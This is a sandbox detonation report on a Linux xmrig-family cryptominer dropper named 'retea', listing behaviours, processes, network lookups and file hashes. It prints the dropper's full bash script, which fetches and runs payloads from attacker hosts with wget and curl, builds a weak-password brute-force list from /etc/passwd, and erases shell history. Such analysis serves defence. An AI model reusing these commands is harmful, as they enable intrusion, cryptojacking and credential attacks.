Analysis Overview
SHA256
061f2562bf4ad2db25f218e218920aece057024cd2c8826c87f65acc29583191
Threat Level: Known bad
The file retea was found to be: Known bad.
Malicious Activity Summary
xmrig
Xmrig_linux family
File and Directory Permissions Modification
Enumerates running processes
UPX packed file
Reads CPU attributes
Reads runtime system information
System Network Configuration Discovery
Writes file to shm directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-22 18:05
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 18:05
Reported
2024-11-22 18:09
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
57s
Max time network
147s
Command Line
Signatures
Xmrig_linux family
xmrig
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /dev/shm/.x/network | N/A |
| N/A | N/A | /bin/bash | N/A |
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1564/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/207/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/99/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/26/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1053/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/499/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1280/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1372/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/263/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/97/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1107/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/92/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1013/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1162/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1566/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1165/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/411/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/26/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/195/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/91/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/213/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/11/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/675/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1310/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/94/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/209/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/85/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1204/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1254/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1062/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/992/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1088/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/665/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1098/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/18/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/588/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1228/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/75/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1280/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/12/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/110/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/74/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/716/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/586/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/411/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1053/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/215/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1285/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/845/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/2/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/679/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/10/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/9/status | /usr/bin/pkill | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/rm | N/A |
Writes file to shm directory
| Description | Indicator | Process | Target |
| File opened for modification | /dev/shm/.x/pass | /bin/bash | N/A |
| File opened for modification | /dev/shm/.x/i | /bin/bash | N/A |
| File opened for modification | /dev/shm/.x/bios.txt | /bin/bash | N/A |
| File opened for modification | /dev/shm/.x/.usrs | /bin/bash | N/A |
Processes
/tmp/retea
[/tmp/retea]
/bin/bash
[/tmp/retea -c exec '/tmp/retea' "$@" /tmp/retea]
/tmp/retea
[/tmp/retea]
/bin/bash
[/tmp/retea -c #!/bin/bash key=$1 user=$2 if [[ $key == "KOFVwMxV7k7XjP7fwXPY6Cmp16vf8EnL54650LjYb6WYBtuSs3Zd1Ncr3SrpvnAU" ]] then echo -e "" else echo Logged with successfully. rm -rf .retea crontab -r ; pkill xrx ; pkill haiduc ; pkill blacku ; pkill xMEu ; cd /var/tmp ; rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp ; mkdir /tmp/.tmp ; pkill Opera ; rm -rf xmrig .diicot .black Opera ; rm -rf .black xmrig.1 ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ; wget -q dinpasiune.com/payload || curl -O -s -L dinpasiune.com/payload || wget80.76.51.5/payload || curl -O -s -L80.76.51.5/payload ; chmod +x * ; ./payload >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history chmod +x .teaca ; ./.teaca > /dev/null 2>&1 ; history -c ; rm -rf .bash_history ~/.bash_history fi rm -rf /etc/sysctl.conf ; echo "fs.file-max = 2097152" > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999 cd /dev/shm mkdir /dev/shm/.x > /dev/null 2>&1 mv network .x/ cd .x rm -rf retea ips iptemp ips iplist sleep 1 rm -rf pass useri=`cat /etc/passwd |grep -v nologin |grep -v false |grep -v sync |grep -v halt|grep -v shutdown|cut -d: -f1` echo $useri > .usrs pasus=.usrs check=`grep -c . .usrs` for us in $(cat $pasus) ; do printf "$us $us\n" >> pass printf "$us $us"$us"\n" >> pass printf "$us "$us"123\n" >> pass printf "$us "$us"123456\n" >> pass printf "$us 123456\n">> pass printf "$us 1\n">> pass printf "$us 12\n">> pass printf "$us 123\n">> pass printf "$us 1234\n">> pass printf "$us 12345\n">> pass printf "$us 12345678\n">> pass printf "$us 123456789\n">> pass printf "$us 123.com\n">> pass printf "$us 123456.com\n">> pass printf "$us 123\n" >> pass printf "$us 1qaz@WSX\n" >> pass printf "$us "$us"@123\n" >> pass printf "$us "$us"@1234\n" >> pass printf "$us "$us"@123456\n" >> pass printf "$us "$us"123\n" >> pass printf "$us "$us"1234\n" >> pass printf "$us "$us"123456\n" >> pass printf "$us qwer1234\n" >> pass printf "$us 111111\n">> pass printf "$us Passw0rd\n" >> pass printf "$us P@ssw0rd\n" >> pass printf "$us qaz123!@#\n" >> pass printf "$us !@#\n" >> pass printf "$us password\n" >> pass printf "$us Huawei@123\n" >> pass done wait sleep 0.5 cat bios.txt | sort -R | uniq | uniq > i cat i > bios.txt ./network "rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history" sleep 25 function Miner { rm -rf /dev/shm/retea /dev/shm/.magic ; rm -rf /dev/shm/.x ~/retea /tmp/kuak /tmp/diicot /tmp/.diicot ; rm -rf ~/.bash_history history -c } Miner /tmp/retea]
/usr/bin/rm
[rm -rf .retea]
/usr/bin/crontab
[crontab -r]
/usr/bin/pkill
[pkill xrx]
/usr/bin/pkill
[pkill haiduc]
/usr/bin/pkill
[pkill blacku]
/usr/bin/pkill
[pkill xMEu]
/usr/bin/rm
[rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp]
/usr/bin/mkdir
[mkdir /tmp/.tmp]
/usr/bin/pkill
[pkill Opera]
/usr/bin/rm
[rm -rf xmrig .diicot .black Opera]
/usr/bin/rm
[rm -rf .black xmrig.1]
/usr/bin/pkill
[pkill cnrig]
/usr/bin/pkill
[pkill java]
/usr/bin/killall
[killall java]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/killall
[killall cnrig]
/usr/bin/killall
[killall xmrig]
/usr/bin/wget
[wget -q dinpasiune.com/payload]
/usr/bin/curl
[curl -O -s -L dinpasiune.com/payload]
/var/tmp/wget80.76.51.5/payload
[wget80.76.51.5/payload]
/usr/bin/curl
[curl -O -s -L80.76.51.5/payload]
/usr/bin/chmod
[chmod +x systemd-private-9faebdbd91c94f559bb8c94d92724182-ModemManager.service-lAvep9 systemd-private-9faebdbd91c94f559bb8c94d92724182-colord.service-uYapRX systemd-private-9faebdbd91c94f559bb8c94d92724182-power-profiles-daemon.service-15dHNu systemd-private-9faebdbd91c94f559bb8c94d92724182-switcheroo-control.service-NtnwxA systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-logind.service-1kK5cw systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-oomd.service-zbT20I systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-resolved.service-1E39rf systemd-private-9faebdbd91c94f559bb8c94d92724182-upower.service-tRdU3B]
/usr/bin/rm
[rm -rf .bash_history /root/.bash_history]
/var/tmp/payload
[./payload]
/usr/bin/chmod
[chmod +x .teaca]
/var/tmp/.teaca
[./.teaca]
/usr/bin/rm
[rm -rf .bash_history /root/.bash_history]
/usr/bin/rm
[rm -rf /etc/sysctl.conf]
/usr/sbin/sysctl
[sysctl -p]
/usr/bin/mkdir
[mkdir /dev/shm/.x]
/usr/bin/mv
[mv network .x/]
/usr/bin/rm
[rm -rf retea ips iptemp ips iplist]
/usr/bin/sleep
[sleep 1]
/usr/bin/rm
[rm -rf pass]
/usr/bin/grep
[grep -v halt]
/usr/bin/grep
[grep -v sync]
/usr/bin/cut
[cut -d: -f1]
/usr/bin/grep
[grep -v shutdown]
/usr/bin/grep
[grep -v false]
/usr/bin/grep
[grep -v nologin]
/usr/bin/cat
[cat /etc/passwd]
/usr/bin/grep
[grep -c . .usrs]
/usr/bin/cat
[cat .usrs]
/usr/bin/sleep
[sleep 0.5]
/usr/bin/uniq
[uniq]
/usr/bin/sort
[sort -R]
/usr/bin/uniq
[uniq]
/usr/bin/cat
[cat bios.txt]
/usr/bin/cat
[cat i]
/dev/shm/.x/network
[./network rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history]
/usr/bin/sleep
[sleep 25]
/usr/bin/rm
[rm -rf /dev/shm/retea /dev/shm/.magic]
/usr/bin/rm
[rm -rf /dev/shm/.x /root/retea /tmp/kuak /tmp/diicot /tmp/.diicot]
/usr/bin/rm
[rm -rf /root/.bash_history]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | bashupload.com | udp |
| US | 8.8.8.8:53 | bashupload.com | udp |
| DE | 116.203.186.178:80 | bashupload.com | tcp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
Files
memory/1566-1-0x0000000000400000-0x00000000006c3d18-memory.dmp
memory/1566-2-0x0000000000400000-0x00000000006c3d18-memory.dmp
/dev/shm/.x/.usrs
| MD5 | 193fbe42d4ec68ee592f790558a6b2a2 |
| SHA1 | 1e71a73294e1a6cabf1c87d4241e4ed2e672879e |
| SHA256 | 6f67376894c0041f09a2128653255533724c15151006bb153e7cab389f2ff6d1 |
| SHA512 | c70248c473a9782eed317792fd8535b6674be9967cdc9450c61dc16354dbf81a1e015cc3321ebb15c3c2fdab378f4ce29e9e4f15a7cf2c1e4ba351031fba7bd6 |
/dev/shm/.x/pass
| MD5 | 8098791106f621a1139c64db9e6b8604 |
| SHA1 | 43b301e1e9d987c85896bea1368ef3d2fab7bb99 |
| SHA256 | 2f97a866a83e4b4e086aaaffa38f0ef0279f20a333f40bdb07f3401a5ce81fe1 |
| SHA512 | e3c0415f91da102dcb1cb63fcc09cab89d08ad373cb83b48bd2f134b1e7ebc87ce20228e005735cf00e268f2f69b8de114f5ddf00de34dc40931251460487bc4 |
/dev/shm/.x/pass
| MD5 | 76723d6902d4634e5c05b3622130f880 |
| SHA1 | fd0a01f2a4c57a93356e97ca54776548df682da0 |
| SHA256 | 771113db09bddf605b93389525f97b4d72e8b3187b75a2cf36884938e5ca3291 |
| SHA512 | a7467f8eb5b6c3c18aa7206fed5e1645305aa828afc0368e9dd1363b13b190a53edfeda371226c041596c004dda808e173647996757474d54015c0fa81a98670 |
/dev/shm/.x/pass
| MD5 | dc96666f8a529179a201af92383360ea |
| SHA1 | 6baaba36e42373b0c8b36657d84225820b02c018 |
| SHA256 | de890c75210a94e89ee7883d28f94a6f3481ce89f6fb6e56c06f05391a438b79 |
| SHA512 | c58a22420020327de96491e3f7be282c339670442196a3dd94cd700d6214cbcff6dfea68e5418bb5c0cac983885ac4e85a44ac08917c2a7d077b812b7efbd760 |
/dev/shm/.x/pass
| MD5 | 0ef6d2e7604d35dd9411089bbb1942ba |
| SHA1 | f5a8646033c5df1a6ac820d93283d7314da4f16a |
| SHA256 | 0b2c4e44393449ec5c5184282d7790aa4fb2218085449e359816916553375ae7 |
| SHA512 | 625e18753b45ad17eaf8c37213db85c9371cce7c43a822492821b6e6434f0a291ee06185bba08b41c5a51759a58c99779b765cdc38aa76f831900d5fb8c61e5f |
/dev/shm/.x/pass
| MD5 | 534c18fea42e4d4ee6821592f118fc12 |
| SHA1 | 32aa842a6f8815cd3b571b0e070cd681d635a6de |
| SHA256 | 9f7ef656b1d8ed7c046d3ca49bb523b981baee7742669d7790fce5a6381254c8 |
| SHA512 | 622c643a9c9e41b18b99f54eac1723332ae7bd26d42105747951e578c55be5fc2338879fd79a9008df6f6e7f69a4e203104998fe8f48ff53fddd675f209bfa90 |
/dev/shm/.x/pass
| MD5 | 3059976a246142a1997b6ce328dbe4cf |
| SHA1 | 3794c3c89504f72068626242b4447f2e7912a8c5 |
| SHA256 | bbd8c4db89a96f9bbd8b0bbf9968c3ffa011f1d16c28d11b8450ae238f2bbd2b |
| SHA512 | 2514fb4cd73ef16d488c138f2dad8e55a48d3597ceade88e7a73762b3e1a6c652e30a31b1769de651433004e538c58ce0ab04b936e279598fad848e9c4460fbf |